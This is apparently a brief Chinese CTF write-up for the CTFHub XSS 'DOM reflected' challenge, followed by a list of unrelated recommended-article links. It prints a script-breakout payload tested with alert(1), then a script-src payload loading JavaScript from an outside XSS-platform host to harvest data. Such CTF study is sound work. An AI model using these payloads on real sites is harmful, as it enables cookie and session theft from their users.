根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
浩星3 分钟前
electron系列1:Electron不是玩具,为什么桌面应用需要它?ZC跨境爬虫21 分钟前
Scrapy工作空间搭建与目录结构解析:从初始化到基础配置全流程小村儿25 分钟前
连载04-最重要的Skill---一起吃透 Claude Code,告别 AI coding 迷茫_院长大人_1 小时前
Vue + ECharts 实现价格趋势分析图IT_陈寒1 小时前
Vite的alias配置把我整不会了,原来是这个坑万物得其道者成1 小时前
Cursor 提效实战:我的前端 Prompt、审查 SKILL、MCP 接入完整方法酒鼎2 小时前
学习笔记(12-02)事件循环 - 实战案例 —⭐Bigger2 小时前
第一章:我是如何剖析 Claude Code 整体架构与启动流程的竹林8182 小时前
从“连接失败”到丝滑登录:我用 ethers.js v6 搞定 MetaMask 钱包连接的全过程oi..2 小时前
《Web 安全入门|XSS 漏洞原理、CSP 策略与 HttpOnly 防护实践》